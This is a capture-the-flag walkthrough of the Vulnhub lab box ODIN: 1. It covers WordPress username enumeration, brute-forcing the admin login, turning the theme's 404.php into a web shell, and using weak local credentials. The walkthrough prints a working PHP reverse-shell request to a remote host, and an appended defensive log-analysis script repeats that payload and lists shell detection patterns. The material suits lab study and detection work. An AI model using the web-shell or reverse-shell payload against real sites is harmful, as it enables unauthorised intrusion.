Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants, in the guise of a wanderer named Vegtam. Mímir, who guarded the well, asked him to sacrifice his left eye before allowing him to drink from it, this being a symbol of his will to obtain knowledge.
This is ODIN: 1 from Vulnhub.
Just another Joomla site
But that’s a little joke because it’s actually WordPress.
root@kali:/opt/vulnhub/odin# wpscan -e --url http://odin
wp-scan only finds a user called ‘odin’, but trying to login at wp-admin with any random password gives an error:
Unknown username. Check again or try your email address.
So that’s curious. What if we try admin?
Error: The password you entered for the username admin is incorrect
Right. So admin exists and odin does not: the login form gives a different error for a valid username than for an unknown one, which confirms which accounts are real. What’s up with that, wp-scan? Lol.
We also have some encoded strings on the blog:
NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTUMFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===
This is base32:
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist
We have this:
Which is base64:
If you look closely, you won’t need it here
Which appears to be brainf^%k, which translates to:
Which never turns out to be useful.
So a password attack on admin? Yes.
One of the blog posts is called:
Twenty Twenty: 404 Template (404.php)
Wonder if that is a hint?
We can edit the file here:
into the upper part of the file beneath the opening html tag. We can then access the file at:
And issue commands. Like a shell. Like this:
GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.150",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
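As an added example (not part of the original writeup), here is a defender-side script that picks the two traces this chain leaves in the web server’s access log: the password attack on wp-login.php and the theme’s 404.php being requested directly with a cmd parameter. The log lines, IP addresses and timestamps are constructed; the marker list and threshold are my assumptions.

```python
"""Detect the ODIN-style WordPress attack chain in Apache access logs: repeated wp-login
POSTs (password guessing) and theme template files requested directly with a query string
(a 404.php turned into a web shell). Sample log lines below are constructed."""
import re
from collections import Counter
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" \d{3} ')
THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/[^?]+\.php$")
SHELL_MARKERS = ("php -r", "fsockopen(", "exec(", "system(", "passthru(", "/bin/sh")
LOGIN_THRESHOLD = 5  # POSTs to wp-login.php from one IP before we call it password guessing

def analyze(lines):
    """Return (ip, alert_kind, path, details) tuples for suspicious requests."""
    alerts, login_posts = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        ip, method, target = m["ip"], m["method"], m["target"]
        path, _, query = target.partition("?")
        if method == "POST" and path == "/wp-login.php":
            login_posts[ip] += 1
        if THEME_PHP_RE.match(path) and query:
            # WordPress includes theme templates itself; a client fetching one directly
            # with parameters is the pattern of an edited template used as a web shell.
            decoded = unquote_plus(query)
            hits = [mk for mk in SHELL_MARKERS if mk in decoded]
            alerts.append((ip, "theme-webshell" if hits else "theme-direct-request", path, hits))
    for ip, n in login_posts.items():
        if n >= LOGIN_THRESHOLD:
            alerts.append((ip, "wp-login-bruteforce", "/wp-login.php", [f"{n} POSTs"]))
    return alerts

# Constructed sample: six login attempts, a probe of the edited 404.php, the reverse-shell
# request from the writeup with its quotes URL-encoded, and a benign stylesheet fetch.
LOGIN_LINE = '192.168.1.150 - - [10/Oct/2020:14:05:{:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4401 "-" "Mozilla/5.0"'
SAMPLE_LOG = [LOGIN_LINE.format(s) for s in range(6)] + [
    '192.168.1.150 - - [10/Oct/2020:14:09:30 +0000] "GET /wp-content/themes/twentytwenty/404.php?cmd=id HTTP/1.1" 200 55 "-" "curl/7.72.0"',
    '192.168.1.150 - - [10/Oct/2020:14:09:42 +0000] "GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+%27%24sock%3dfsockopen(%22192.168.1.150%22,1234)%3bexec(%22/bin/sh+-i+<%263+>%263+2>%263%22)%3b%27 HTTP/1.1" 200 0 "-" "curl/7.72.0"',
    '10.0.0.7 - - [10/Oct/2020:14:10:00 +0000] "GET /wp-content/themes/twentytwenty/style.css?ver=1.5 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The stylesheet request is not flagged because only .php files under the theme directory count; a real deployment would also compare the flagged template against the copy shipped in the theme package.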
On the box
We can log in to MySQL with joomla:joomla and grab some hashes, but they don’t break easily. There is a shortcut here, though: LinPEAS has a mode (-a) that will brute force su, and we have weak passwords:
So really that’s it; let’s check it: